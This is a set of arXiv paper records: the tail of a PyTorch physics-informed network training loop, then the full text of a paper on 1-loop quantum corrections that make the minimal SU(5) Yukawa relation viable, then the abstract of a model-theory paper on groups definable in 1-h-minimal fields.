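xf = torch.empty(1000).uniform_(-5.0, 5.0); t_f = torch.empty(1000).uniform_(-1.0, 1.0)

gamma = 1e-3
for step in range(30000):
    opt.zero_grad()
    f_r, f_m = fle_residuals(net, xf, t_f)
    loss = (data_loss(net, x0, t0, r0, m0)
            + data_loss(net, xb, tb, rb, mb)
            + gamma * (torch.mean(f_r ** 2) + torch.mean(f_m ** 2)))
    loss.backward()
    opt.step()
```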
2310.16563
Quantum corrections and the minimal Yukawa sector of $SU(5)$
It is well-known that the $SU(5)$ grand unified theory, with the standard model quarks and leptons unified in $\overline{5}$ and $10$ and the electroweak Higgs doublet residing in $5$-dimensional representations, leads to the relation $Y_d=Y_e^T$ between the Yukawa couplings of the down-type quarks and the charged leptons. We show that this degeneracy can be lifted in a phenomenologically viable way when quantum corrections to the tree-level matching conditions are taken into account in the presence of one or more copies of gauge singlet fermions. The 1-loop threshold corrections arising from heavy leptoquark scalar and vector bosons, already present in the minimal model, and heavy singlet fermions can lead to realistic Yukawa couplings provided their masses differ by at least two orders of magnitude. The latter can also lead to a realistic light neutrino mass spectrum through the type I seesaw mechanism if the colour partner of the Higgs stays close to the Planck scale. Most importantly, our findings demonstrate the viability of the simplest Yukawa sector when quantum corrections are considered and sizeable threshold effects are present.
Ketan M. Patel, Saurabh K. Shukla
2023-10-25T11:34:10Z
http://arxiv.org/abs/2310.16563v2
# Quantum corrections and the minimal Yukawa sector of \(Su(5)\) ###### Abstract It is well-known that the \(SU(5)\) grand unified theory, with the standard model quarks and leptons unified in \(\overline{5}\) and \(10\) and the electroweak Higgs doublet residing in \(5\) dimensional representations, leads to relation, \(Y_{d}=Y_{e}^{T}\), between the Yukawa couplings of the down-type quarks and the charged leptons. We show that this degeneracy can be lifted in a phenomenologically viable way when quantum corrections to the tree-level matching conditions are taken into account in the presence of one or more copies of gauge singlet fermions. The \(1\)-loop threshold corrections arising from heavy leptoquark scalar and vector bosons, already present in the minimal model, and heavy singlet fermions can lead to realistic Yukawa couplings provided their masses differ by at least two orders of magnitude. The latter can also lead to a realistic light neutrino mass spectrum through the type \(1\) seesaw mechanism if the colour partner of the Higgs stays close to the Planck scale. Most importantly, our findings demonstrate the viability of the simplest Yukawa sector when quantum corrections are considered and sizeable threshold effects are present. ## I Introduction After the remarkable realization of the potential unification of the standard model (SM) gauge symmetries into a single gauge symmetry nearly fifty years ago [1; 2; 3], it has since become well-established that the Yukawa sector of the SM plays a pivotal role in determining the minimal and viable configurations of grand unified theories (GUT). The latter's potential to partially or completely unite quarks and leptons, in conjunction with the simplest choice of the Higgs field(s) in the Yukawa sector, often results in correlations among the effective SM Yukawa couplings that are inconsistent with observations. The most glaring and simplest example of the above is the \(SU(5)\) GUTs with only \(5\)-dimensional (\(5\) and \(\overline{5}\)) Lorentz scalar(s) in the Yukawa sector in their ordinary (supersymmetric) versions. Both lead to \[Y_{d}=Y_{e}^{T}\,, \tag{1}\] at the scale of the unified symmetry breaking, namely \(M_{\rm GUT}\), for the down-type quark and charged-lepton Yukawa coupling matrices \(Y_{d}\) and \(Y_{e}\), respectively. The degeneracy between the two sectors predicted by Eq. (1) is not supported by the GUT scale extrapolated values of the effective Yukawa couplings determined from the measured masses of the down-type quarks and the charged leptons [4; 5]. The largest mismatch arises in the case of non-supersymmetric theories in which the extrapolation of the SM data implies, \(y_{b}/y_{\tau}\approx 2/3\), \(y_{s}/y_{\mu}\approx 1/5\) and \(y_{d}/y_{e}\approx 2\), at \(M_{\rm GUT}=10^{16}\) GeV. Deviation from the degeneracy shown in Eq. (1) can be achieved through several means: (a) Expanding the scalar sector [6; 7; 8; 9; 10; 11], for instance, by introducing a \(45\)-dimensional Higgs field, or (b) Incorporating higher-dimensional non-renormalizable operators [12; 13; 14; 15; 16; 17], or (c) Introducing vector-like fermions that mix with the charged leptons and/or down-type quarks residing in the chiral multiplets of \(SU(5)\)[18; 19; 20; 21; 22; 23; 24; 25; 26]. Each of these approaches alters the tree-level matching condition, Eq. (1), and introduces new couplings. These new couplings can be harnessed to obtain effective Yukawa couplings compatible with the SM. 
In this article, we present a rather simple approach to alleviate the degeneracy between charged leptons and down-type quarks. Our method involves incorporating higher-order corrections to the tree-level matching conditions for the Yukawa couplings. Non-trivial implications of such corrections in the context of supersymmetric versions of \(SO(10)\) GUTs have been pointed out in [27; 28; 29]1. In the context of \(SU(5)\), we show that the inclusion of such corrections does not necessitate the introduction of new fermions or scalars charged under the \(SU(5)\) for modifying the tree-level Yukawa relations. This sets the present proposal apart from the previous ones outlined as (a-c) above. Specifically, we demonstrate that by expanding the minimal non-supersymmetric \(SU(5)\) framework to include fermion singlets and accounting for threshold corrections to the Yukawa couplings originating from these singlets, along with the leptoquark scalar and vector components already present in the minimal setup, a fully realistic fermion spectrum can be achieved. Footnote 1: Nevertheless, the degeneracy, as in Eq. (1), is absent in these models even at the tree level due to the presence of multiple scalars containing the SM Higgs doublets. ## II Yukawa relations at \(1\)-loop The Yukawa sector of the model is comprised of three generations of \(\mathbf{10}\), \(\overline{\mathbf{5}}\) and \(N\) generations of the gauge singlet \(\mathbf{1}\) Weyl fermions and a Lorentz scalar \(5_{H}\). The most general renormalizable interactions between these fields can be parametrized as \[\mathcal{L}_{\rm Y} = \frac{1}{4}(Y_{1})_{ij}\mathbf{10}_{i}^{T}C\mathbf{10}_{j}5_{H}+ \sqrt{2}(Y_{2})_{ij}\mathbf{10}_{i}^{T}C\overline{\mathbf{5}}_{j}5_{H}^{*} \tag{2}\] \[+ (Y_{3})_{i\alpha}\overline{\mathbf{5}}_{i}^{T}C\mathbf{1}_{a}5_{H }+{\rm h.c.}\,,\] with \(i,j=1,2,3\) and \(\alpha=1,...,N\) denotes the generations and \(C\) is the usual charge-conjugation matrix. We have suppressed the gauge and Lorentz indices for brevity. The symmetric nature of the first term implies \(Y_{1}=Y_{1}^{T}\). The singlet fermions, also to be referred as the right-handed (RH) neutrinos, can acquire a gauge invariant Majorana masses: \[\mathcal{L}_{M}=-\frac{1}{2}(M_{N})_{\alpha\beta}\mathbf{1}_{\alpha}^{T}C \mathbf{1}_{\beta}+{\rm h.c.}\,. \tag{3}\] The SM quarks and leptons residing in the \(SU(5)\) multiplets are identified as \(\mathbf{10}^{ab}=\frac{1}{\sqrt{2}}\epsilon^{abc}u_{c}^{C}\), \(\mathbf{10}^{am}=-\frac{1}{\sqrt{2}}q^{am}\), \(\mathbf{10}^{mn}=-\frac{1}{\sqrt{2}}\epsilon^{mn}e^{C}\), \(\overline{\mathbf{5}}_{a}=d_{a}^{C}\), \(\overline{\mathbf{5}}_{m}=\epsilon_{mn}l^{n}\) and \(\mathbf{1}=\nu^{C}\), where \(a,b,c\) denote the color while \(m,n\) are \(SU(2)\) indices. For the scalar, we define a colour triplet \(T^{a}\equiv 5_{H}^{a}\) and an electroweak doublet \(h^{m}\equiv 5_{H}^{m}\)[30]. Decompositions of Eq. 
(2) then lead to the following Yukawa interactions with the colour triplet and Higgs: \[-\mathcal{L}_{\rm Y}^{(T)} = (Y_{1})_{ij}\left(u_{i}^{CT}Ce_{j}^{C}+\frac{1}{2}q_{i}^{T}Cq_{j }\right)T \tag{4}\] \[- (Y_{3})_{i\alpha}\,d_{i}^{CT}C\nu_{\alpha}^{C}T\] \[- (Y_{2})_{ij}\left(u_{i}^{(CT}Cd_{j}^{C}+q_{i}^{T}Cl_{j}\right)T^{ *}+{\rm h.c.}\,,\] and \[-\mathcal{L}_{\rm Y}^{(h)} = (Y_{1})_{ij}q_{i}^{T}Cu_{j}^{C}\tilde{h}+(Y_{2})_{ij}q_{i}^{T}Cd_ {j}^{C}h^{*} \tag{5}\] \[+ (Y_{3})_{i\alpha}l_{i}^{T}C\nu_{\alpha}^{C}\tilde{h}+(Y_{2}^{T})_ {ij}l_{i}^{T}Ce_{j}^{C}h^{*}+{\rm h.c.}\,,\] where \(\tilde{h}=\epsilon h\) and we have suppressed the \(SU(3)\) and \(SU(2)\) contractions. Matching of \(\mathcal{L}_{\rm Y}^{(h)}\) with the SM Yukawa Lagrangian at tree level leads to \(Y_{u}=Y_{1}\) and \(Y_{d}=Y_{e}^{T}=Y_{2}\) at the renormalization scale \(\mu=M_{\rm GUT}\). For the matching at 1-loop, the Yukawa couplings receive two types of contributions. The first arises from the vertex corrections involving the colour triplet or the leptoquark gauge boson in the loop. The interaction of the latter with the SM fermions originates from the unified gauge interaction and it is given by [4; 5] \[-\mathcal{L}_{\rm G}^{(X)} = \frac{g}{\sqrt{2}}\overline{X}_{\mu}\left(\overline{d^{C}}_{i} \overline{\sigma}^{\mu}l_{i}-\overline{q}_{i}\overline{\sigma}^{\mu}u_{i}^{C}- \overline{e^{C}}_{i}\overline{\sigma}^{\mu}q_{i}\right)+{\rm h.c.}\,,\] where \(X\) transforms as \((3,2,-5/6)\) under the SM gauge symmetry. The second type of contribution to the Yukawa threshold correction is due to wavefunction renormalization of fermions and scalar involving at least one of the heavy fields in the loop. The 1-loop corrected matching condition for the Yukawa couplings at a renormalization scale \(\mu\) is given by \[Y_{f}=Y_{f}^{0}\left(1-\frac{K_{h}}{2}\right)+\delta Y_{f}-\frac{1}{2}\left(K_{ f}^{T}Y_{f}^{0}+Y_{f}^{0}K_{f^{C}}\right), \tag{7}\] where \(f=u,d,e,\nu\). The details of the derivation of the above expression are outlined in Appendix A. In Eq (7), \(\delta Y_{f}\) are the finite parts of 1-loop corrections to the Yukawa vertex \(Y_{f}\) while \(K_{f,f^{C},h}\) are the finite parts of the wavefunction renormalization diagrams involving heavy particles in the loops evaluated in the \(\overline{\rm MS}\) scheme. \(Y_{f}^{0}\) denotes the tree-level Yukawa coupling matrix. As mentioned earlier, \[Y_{u}^{0}=Y_{1}\,,\ \ Y_{d}^{0}=Y_{2}\,,\ \ Y_{e}^{0}=Y_{2}^{T}\,,\ \ Y_{\nu}^{0}=Y_{3}\,, \tag{8}\] at \(\mu=M_{\rm GUT}\). Next, we compute \(\delta Y_{f}\) using the interaction terms given in Eqs. (4,5,6) and assuming massive color triplet scalar \(T\), vector leptoquark \(X\) and \(N\) generations of the RH neutrinos \(\nu_{\alpha}^{C}\). We find, \[(\delta Y_{u})_{ij} = 4g^{2}(Y_{1})_{ij}f[M_{X}^{2},0]\] \[+ \left(Y_{1}Y_{2}^{*}Y_{2}^{T}+Y_{2}Y_{2}^{T}Y_{1}^{T}\right)_{ij} f[M_{T}^{2},0],\] \[(\delta Y_{d})_{ij} = 2g^{2}(Y_{2})_{ij}f[M_{X}^{2},0]+\left(Y_{1}Y_{1}^{*}Y_{2}\right)_ {ij}f[M_{T}^{2},0]\] \[+ \sum_{\alpha}\left(Y_{2}Y_{3}^{*}\right)_{i\alpha}\left(Y_{3}^{T} \right)_{\alpha j}f[M_{T}^{2},M_{N_{\alpha}}^{2}],\] \[(\delta Y_{e})_{ij} = 6g^{2}(Y_{2}^{T})_{ij}f[M_{X}^{2},0]+3\left(Y_{2}^{T}Y_{1}^{*}Y_{ 1}\right)_{ij}f[M_{T}^{2},0],\] \[(\delta Y_{\nu})_{i\alpha} = 3\left(Y_{2}^{T}Y_{2}^{*}Y_{3}\right)_{i\alpha}f[M_{T}^{2},0], \tag{9}\] at the scale \(\mu\). Here, \(M_{N_{\alpha}}\) is the mass of \(\nu_{\alpha}^{C}\) and \(f[m_{1}^{2},m_{2}^{2}]\) is a loop integration factor and it is given in Eq. 
(20) in the Appendix B. It can be noticed that other than the overall colour factor, \(\delta Y_{d}\) and \(\delta Y_{e}\) differ by the contribution from the heavy RH neutrinos. Because of the tree-level Yukawa couplings between \(d_{i}^{C}\), \(\nu_{\alpha}^{C}\) and \(T\) in Eq. (4), the \(Y_{d}\) gets threshold correction from the RH neutrinos and colour triplet scalar. It is noteworthy that the corrections \(\delta Y_{f}\) vanish in the supersymmetric version of the model [31], due to the perturbative non-renormalisation theorem for the supersymmetric field theories [32; 33]. The computations of the finite parts of wavefunction renormalization for the light fermions and scalar at 1-loop, involving at least one heavy fields in the loop, lead to: \[(K_{q})_{ij} = 3g^{2}\delta_{ij}h[M_{X}^{2},0]\] \[- \frac{1}{2}\left(Y_{1}^{*}Y_{1}^{T}+2Y_{2}^{*}Y_{2}^{T}\right)_{ij}h [M_{T}^{2},0],\] \[(K_{u^{c}})_{ij} = 4g^{2}\delta_{ij}h[M_{X}^{2},0]\] \[- \left(Y_{1}^{*}Y_{1}^{T}+2Y_{2}^{*}Y_{2}^{T}\right)_{ij}h[M_{T}^{ 2},0],\] \[(K_{d^{c}})_{ij} = 2g^{2}\delta_{ij}h[M_{X}^{2},0]-2\left(Y_{2}^{\dagger}Y_{2}\right) _{ij}h[M_{T}^{2},0]\] \[- \sum_{\alpha}\left(Y_{3}^{*}\right)_{i\alpha}\left(Y_{3}^{T} \right)_{\alpha j}h[M_{T}^{2},M_{N_{\alpha}}^{2}],\] \[(K_{l})_{ij} = 3g^{2}\delta_{ij}h[M_{X}^{2},0]-3\left(Y_{2}^{\dagger}Y_{2}\right) _{ij}h[M_{T}^{2},0],\] \[(K_{e^{c}})_{ij} = 6g^{2}\delta_{ij}h[M_{X}^{2},0]-3\left(Y_{1}^{\dagger}Y_{1}\right) _{ij}h[M_{T}^{2},0],\] \[(K_{\nu^{c}})_{\alpha\beta} = -3\left(Y_{3}^{\dagger}Y_{3}\right)_{\alpha\beta}h[M_{T}^{2},0],\] \[K_{h} = \frac{g^{2}}{2}\,\left(f[M_{X}^{2},M_{T}^{2}]+g[M_{X}^{2},M_{T}^{ 2}]\right), \tag{10}\] at the scale \(\mu\). The loop integration factors are defined in Appendix B. Again, only \(K_{d^{C}}\) receives a contribution from the singlet fermions. As we show in the next sections, these contributions from singlet fermions are crucial for uplifting degeneracy between the charged lepton and down-type quarks. ## III Deviation from \(Y_{d}=Y_{e}^{T}\) It is seen from Eqs. (7,9,10) that the 1-loop corrections break the degeneracy between \(Y_{e}\) and \(Y_{d}\). Explicitly, we obtain at the GUT scale: \[\left(Y_{d}-Y_{e}^{T}\right)_{ij} = -2g^{2}(Y_{2})_{ij}\,\left(2f[M_{X}^{2},0]-h[M_{X}^{2},0]\right) \tag{11}\] \[- \left(Y_{1}Y_{1}^{*}Y_{2}\right)_{ij}\,\left(f[M_{T}^{2},0]+ \frac{5}{8}h[M_{T}^{2},0]\right)\] \[+ \sum_{\alpha}\left(Y_{2}Y_{3}^{*}\right)_{i\alpha}\left(Y_{3} \right)_{j\alpha}\left(f[M_{T}^{2},M_{N_{\alpha}}^{2}]\right.\] \[+ \left.\frac{1}{2}h[M_{T}^{2},M_{N_{\alpha}}^{2}]\right).\] The above is the main result of this paper. It is noteworthy that Eq. (11) not only suggests \(Y_{d}\neq Y_{e}^{T}\) but also implies that the difference between the two matrices is calculable in terms of the masses of the heavy scalar, gauge boson and RH neutrinos and their couplings. The latter also determines the masses of other fermions and hence can be severely constrained as we discuss in the next section. Before assessing the viability of Eq. (11) in reproducing the complete and realistic fermion mass spectrum, we investigate its role for the third generation Yukawa couplings, namely \(y_{b}\) and \(y_{\tau}\), through a simplified analysis. Considering only one RH neutrino with \(M_{N_{1}}=M_{N}\) and only the third generation, one finds from Eq. 
(11): \[\frac{y_{b}}{y_{\tau}} \simeq 1-2g^{2}\left(2f[M_{X}^{2},0]-h[M_{X}^{2},0]\right) \tag{12}\] \[- 2y_{t}^{2}\left(f[M_{T}^{2},0]+\frac{5}{8}h[M_{T}^{2},0]\right)\] \[+ y_{\nu}^{2}\left(f[M_{T}^{2},M_{N}^{2}]+\frac{1}{2}h[M_{T}^{2},M _{N}^{2}]\right)\,,\] at the GUT scale. Here, \(y_{t}\) is the top-quark Yukawa coupling and \(y_{\nu}=(Y_{3})_{31}\). For some sample values of \(y_{t}\), \(y_{\nu}\) and \(\mu=M_{X}=10^{16}\) GeV, the contours corresponding to different values of the ratio \(y_{b}/y_{\tau}\) on the \(M_{T}\)-\(M_{N}\) plane are displayed in Fig. 1. The GUT scale extrapolation of the observed fermion mass data requires \(y_{b}/y_{\tau}\approx 2/3\). As can be seen from Fig. 1, this can be achieved only if either \(M_{T}\) or \(M_{N}\) is larger than \(\mu=M_{X}\) by at least one to two orders of magnitude. Moreover, \(y_{\nu}\) is also required to be large. For \(g,y_{t}<1\), it is the third term in Eq. (12) which is required to dominantly contribute to uplift the degeneracy between \(y_{b}\) and \(y_{\tau}\) and hence the largest possible value of \(y_{\nu}\) is preferred. \(M_{T}\gg M_{\rm GUT}\) or \(M_{N}\gg M_{\rm GUT}\) along with large \(y_{\nu}\) are needed to overcome the loop suppression factor of \(1/(16\pi)^{2}\). This simple picture provides a clear and qualitative understanding of the favourable mass scales of the colour triplet scalar and RH neutrino and it also holds more or less when the full three generation fermion spectrum is considered as we show in the next section. It is noteworthy that the RH neutrino through its coupling with the lepton doublet generates a contribution to the light neutrino mass through the usual type I seesaw mechanism [34; 35; 36; 37]. It is obtained as \(m_{\nu}=v^{2}y_{\nu}^{2}/M_{N}\). If this contribution is required to generate the atmospheric neutrino mass scale then one finds, \[M_{N}=7.6\times 10^{16}\,\text{GeV}\,\left(\frac{y_{\nu}}{\sqrt{4\pi}}\right)^{2} \,\left(\frac{0.05\,\text{eV}}{m_{\nu}}\right)\,. \tag{13}\] Since \(M_{N}\) cannot be much larger than \(M_{\text{GUT}}\) in this case, phenomenologically viable \(y_{b}/y_{\tau}\) can be achieved only if \(M_{T}>M_{\text{GUT}}\). Conversely, when considering perturbative values of \(y_{\nu}\) and a situation where \(M_{N}\) greatly surpasses \(M_{\text{GUT}}\), the RH neutrino's contribution to the light neutrino mass is rather negligible. This inadequacy to reproduce a viable atmospheric neutrino mass scale necessitates the inclusion of an additional source of neutrino masses. We also provide an example of this in the next section. ## IV Viability test and results To establish if the \(Y_{u}\), \(Y_{d}\) and \(Y_{e}\) are evaluated from Eqs. (7,9,10) can reproduce the realistic values of the SM Yukawa couplings and the quark mixing (CKM) matrix, we carry out the \(\chi^{2}\) optimization. Focusing on the minimal setup, we first consider only one RH neutrino with mass \(M_{N_{1}}\equiv M_{N}\) as mentioned in the previous section. The \(\chi^{2}\) function (see for example [38; 39] for the definition and optimization procedure) includes 9 diagonal charged fermion Yukawa couplings and 4 CKM parameters. For the input values of these parameters at the GUT scale, we evolve the SM Yukawa couplings from \(\mu=M_{t}\) (\(M_{t}\) being the top pole mass) to \(\mu=M_{\text{GUT}}=10^{16}\) GeV using the 2-loop renormalization group equations (RGEs) in the \(\overline{\text{MS}}\) scheme following the procedure outlined in [39]. 
The 2-loop SM RG equations have been computed using the PyR@TE 3 package [40]. The values of the SM Yukawa and gauge couplings at \(\mu=M_{t}\) are taken from [41]. The RGE extrapolated values at the GUT scale are listed as \(O_{\text{exp}}\) in Table 1 in Appendix C. For the standard deviations, we use \(\pm 30\%\) in the light quark Yukawa couplings (\(y_{u,d,s}\)) and \(\pm 10\%\) in the rest of the observables as considered in the previous fits [39]. Using the freedom to choose a basis in Eq. (2), we set \(Y_{1}\) diagonal and real. The RH neutrino mass matrix, \(M_{N}\), in general \(N\) flavour case can also be chosen real and diagonal simultaneously. \(Y_{2,3}\) are complex in this basis. Using the Eqs. (7,9,10), we then compute the matrices \(Y_{u,d,e}\) and diagonalize them to obtain the nine diagonal Yukawa couplings and quark mixing parameters. These quantities are fitted to the extrapolated data at \(\mu=M_{\text{GUT}}\) by minimizing the \(\chi^{2}\) function. We set \(M_{X}=M_{\text{GUT}}\) and \(g=0.53\) which is an approximate value of the RGE evolved SM gauge couplings at \(\mu=10^{16}\) GeV. Fixing \(M_{T}\) and \(M_{N}\) to some values, we then minimize the \(\chi^{2}\) along with a constrain \(|(Y_{1,2,3})_{ij}|<\sqrt{4\pi}\) on all the input Yukawa couplings to ensure that they are within the perturbative limits [42]. We repeat this procedure for several values of \(M_{T}\) and \(M_{N}\). The obtained distribution of the minimized \(\chi^{2}\) (\(\equiv\chi^{2}_{\text{min}}\)) is displayed in Fig. 2. Note that without 1-loop corrections, i.e. with \(Y_{d}=Y_{e}^{T}\), the obtained value of \(\chi^{2}_{\text{min}}\) is 53. Therefore, values of \(\chi^{2}_{\text{min}}<53\) show improvements due to quantum corrected matching conditions in the model. In particular, for \(\chi^{2}_{\text{min}}<9\), it is ensured that no observable is more than \(\pm 3\sigma\) away from its central value and, therefore, can be considered to lead to viable charged fermion mass spectrum and the quark mixing. It can be seen from Fig. 2, a very good fit of the entire charged fermion mass spectrum and the quark mixing parameters can be obtained if \(M_{T}\) or \(M_{N}\geq 10^{17.2}\) GeV. These results are in a very good agreement with the limits on \(M_{T}\) and \(M_{N}\) obtained for \(y_{b}/y_{\tau}\lesssim 2/3\) in a simplified case discussed earlier and shown in Fig. 1. The three-generation \(\chi^{2}\) analysis also reveals that all the underlying 13 observables can be fitted within their \(\pm 1\sigma\) range (corresponding to \(\chi^{2}_{\text{min}}\leq 3\)) provided (i) \(M_{T}\leq 10^{14.5}\) GeV and \(M_{N}\geq 10^{17.2}\) GeV, or (ii) \(M_{T}\geq 10^{18.2}\) GeV. While the second leads to \(M_{T}\) alarmingly close to the Planck scale making the doublet-triplet splitting problem [43; 44; 45] more severe, the possibility (i) is conceptually allowed and technically a safe choice. Since \(M_{N}\) is a scale independent of \(M_{\text{GUT}}\) in the present framework, the large hierarchy between them is permitted. Also, \(M_{T}\) can be significantly smaller than \(M_{\text{GUT}}\) provided it satisfies the proton lifetime limit, \(M_{T}\gtrsim 10^{11}\) GeV [30]. We list explicitly one benchmark solution from the region (i) which is displayed as Solution I in Table 1 in Appendix C. Although, the RH neutrino is introduced to reproduce the viable charged fermion mass spectrum, its mass and couplings are not constrained from the requirement of the light neutrino masses and mixing parameters. 
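To make the fitting procedure more concrete, the schematic sketch below shows the generic step of extracting the 13 observables (the 9 Yukawa eigenvalues and 4 CKM parameters) from candidate Yukawa matrices and forming the \(\chi^{2}\). It is illustrative only: the matrices \(Y_{u}\), \(Y_{d}\), \(Y_{e}\) have to be assembled from the 1-loop matching of Eqs. (7), (9) and (10) with the loop functions of Appendix B (not reproduced here), the targets and uncertainties are the GUT-scale values of Table 1, and phase-convention and quadrant ambiguities in the CP phase are ignored.

```python
# Schematic extraction of Yukawa eigenvalues and CKM parameters, and the chi^2 of Sec. IV.
# Assumes Yu, Yd, Ye are 3x3 complex matrices from the 1-loop matching conditions.
import numpy as np

def singular_values_and_left(Y):
    """Y = U_L diag(y) U_R^dagger; returns descending singular values and U_L."""
    U_L, y, _ = np.linalg.svd(Y)
    return y, U_L

def ckm_parameters(V):
    s13 = abs(V[0, 2]); c13 = np.sqrt(1.0 - s13**2)
    s12 = abs(V[0, 1]) / c13
    s23 = abs(V[1, 2]) / c13
    # CP phase via the rephasing-invariant Jarlskog combination (quadrant ambiguity ignored)
    J = np.imag(V[0, 1] * V[1, 2] * np.conj(V[0, 2]) * np.conj(V[1, 1]))
    c12, c23 = np.sqrt(1.0 - s12**2), np.sqrt(1.0 - s23**2)
    delta = np.arcsin(np.clip(J / (c12 * s12 * c23 * s23 * c13**2 * s13), -1.0, 1.0))
    return np.array([s12, s23, s13, delta])

def predictions(Yu, Yd, Ye):
    yu, UuL = singular_values_and_left(Yu)
    yd, UdL = singular_values_and_left(Yd)
    ye, _ = singular_values_and_left(Ye)
    Vckm = UuL.conj().T @ UdL            # up to phase conventions
    return np.concatenate([yu, yd, ye, ckm_parameters(Vckm)])

def chi2(pred, target, sigma):
    return float(np.sum(((np.asarray(pred) - np.asarray(target)) / np.asarray(sigma)) ** 2))
```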
To account for both the solar and atmospheric neutrino mass scales, one needs at least two RH neutrinos in the minimal realization. The light neutrino masses are then generated through the usual type I seesaw mechanism: \[M_{\nu}=-v^{2}\,Y_{\nu}M_{N}^{-1}Y_{\nu}^{T}\,. \tag{14}\] Here, \(M_{\nu}\) is \(3\times 3\) light neutrino mass matrix while \(M_{N}\) is \(2\times 2\) heavy neutrino mass matrix. \(Y_{\nu}\) is \(3\times 2\) matrix which can be computed using Eqs. (7,9,10). The above leads to one massless light neutrino. We extend the \(\chi^{2}\) function to include the solar and atmospheric squared mass differences, three mixing angles and a Dirac CP phase to assess if Eq. (14) along with Eqs. (7,9,10) can provide a realistic spectrum of quarks and leptons. For the input values of neutrino observables, we use the results of the latest fit from [46] and set \(\pm 10\%\) uncertainty as earlier. The RGE effects in neutrino data are neglected as they are known to be small [47; 48; 49; 50] and within the set uncertainty for normal hierarchy in the neutrino masses which is the case considered here. The result of \(\chi^{2}\) minimization for this case is shown in Table 1 as Solution II and the optimized values of parameters are also listed there in Appendix C. As it can be seen, we find a very good agreement with all the fermion masses and mixing parameters with \(\chi^{2}_{\rm min}=4\). The resulting values of \(M_{N_{1}}\) and \(M_{N_{2}}\) are smaller than \(M_{\rm GUT}\) which requires \(M_{T}>10^{17.2}\) GeV as anticipated from Fig. 2. As a simple extension of the possibilities discussed above, it is straightforward to anticipate a case in which there are more than two RH neutrinos present. At least one of them is strongly coupled with the SM fermions and has a mass greater than \(M_{\rm GUT}\). It leads to the required threshold corrections for a viable charged fermion spectrum, however its contribution to the neutrino masses is sub-dominant. The other RH neutrinos have sub-GUT scale masses and can lead to a realistic light neutrino spectrum without significantly altering the threshold corrections. This scenario is exemplified by Solution III in Table 1. In this case, \(N_{3}\), with \(M_{N_{2}}>M_{\rm GUT}\), couples to the SM leptons with large couplings and gives the required threshold corrections to down-type quark sector. Notably, in this context, it is evident that the colour triplet scalar need not approach Planck-scale values to fulfil its role. ## V Conclusion This article demonstrates that the seemingly unviable relationship, \(Y_{d}=Y_{e}^{T}\), predicted by the simplest and most minimal Yukawa sector of non-supersymmetric \(SU(5)\) GUT, can be rendered viable when accounting for 1-loop corrections to the tree-level matching conditions. This is accomplished by introducing one or more copies of fermion singlets. While they do not alter the tree-level matching conditions at the scale of unification, they can yield significant corrections at the 1-loop level through their direct Yukawa interactions with the down-type quarks and the colour triplet scalar. Sizeable non-degeneracy among the singlet fermions, colour triplet scalar, and leptoquark vector can thus impart large enough threshold corrections ensuring the compatibility of the minimal Yukawa sector with the effective SM description. 
Our quantitative analysis reveals that achieving a realistic spectrum for the charged fermion Yukawa couplings and quark mixing necessitates either a significantly larger mass for the colour triplet scalar (\(M_{T}\gg M_{X}\)) or vastly higher masses for the RH neutrinos (\(M_{N_{\alpha}}\gg M_{X}\)), under the assumption that the mass of the leptoquark gauge boson (\(M_{X}\)) defines the unification scale. The latter possibility is disfavoured if the same fermion singlets are expected to generate a viable light neutrino spectrum through the conventional type I seesaw mechanism. Nonetheless, the scenario of \(M_{N_{\alpha}}\gg M_{X}\) remains a plausible option if neutrinos acquire their masses through other means. This also includes type I seesaw mechanism with additional copies of RH neutrinos with sub-GUT scale masses and comparatively smaller couplings with the SM leptons. It is noteworthy that the inclusion of quantum corrections can substantially alter the conclusions regarding the minimal Yukawa sector within the framework of an underlying grand unified theory. These findings provide motivation for conducting analogous investigations in the context of supersymmetric variants of \(SU(5)^{2}\), as well as both the ordinary and supersymmetric versions of \(SO(10)\) GUTs, which feature more diverse particle spectra for threshold corrections and, simultaneously, more stringent symmetries that engage in intricate interplays. ## Acknowledgements We acknowledge illuminating discussions with Charanjit Singh Aulakh and Anjan S. Joshipura. This work is partially supported under the MATRICS project (MTR/2021/000049) funded by the Science & Engineering Research Board (SERB), Department of Science and Technology (DST), Government of India. KMP also acknowledges support from the ICTP through the Associates Programme (2023-2028) where part of this work was carried out.
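As a purely numerical aside, the type I seesaw relation of Eq. (14), used for Solutions II and III, is simple to evaluate; the sketch below uses arbitrary placeholder inputs (not the fitted parameters of Table 1) and exhibits the exactly massless state implied by two RH neutrinos.

```python
# Numerical evaluation of the type I seesaw formula of Eq. (14):
#   M_nu = -v^2 * Y_nu M_N^{-1} Y_nu^T ,  Y_nu: 3x2,  M_N: 2x2 (diagonal).
# All numbers below are arbitrary placeholders, not the fitted values of Table 1.
import numpy as np

v = 174.0                                            # GeV
Y_nu = np.array([[0.10 + 0.02j, 0.05 + 0.00j],
                 [0.30 + 0.00j, 0.00 + 0.20j],
                 [0.50 - 0.10j, 0.40 + 0.00j]])
M_N = np.diag([5.0e13, 2.0e14])                      # GeV

M_nu = -v**2 * Y_nu @ np.linalg.inv(M_N) @ Y_nu.T    # complex symmetric, rank 2

# Physical masses are the singular values of M_nu (Takagi factorization)
masses_eV = np.sort(np.linalg.svd(M_nu, compute_uv=False))[::-1] * 1.0e9
m3, m2, m1 = masses_eV                               # descending; m1 is numerically zero
print("Delta m^2_21 =", m2**2 - m1**2, "eV^2")
print("Delta m^2_31 =", m3**2 - m1**2, "eV^2")
```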
2303.01127
On groups and fields definable in 1-h-minimal fields
We show that an infinite group $G$ definable in a $1$-h-minimal field admits a strictly $K$-differentiable structure with respect to which $G$ is a (weak) Lie group, and show that definable local subgroups sharing the same Lie algebra have the same germ at the identity. We conclude that infinite fields definable in $K$ are definably isomorphic to finite extensions of $K$ and that $1$-dimensional groups definable in $K$ are finite-by-abelian-by-finite. Along the way we develop the basic theory of definable weak $K$-manifolds and definable morphisms between them.
Juan Pablo Acosta, Assaf Hasson
2023-03-02T10:18:50Z
http://arxiv.org/abs/2303.01127v1
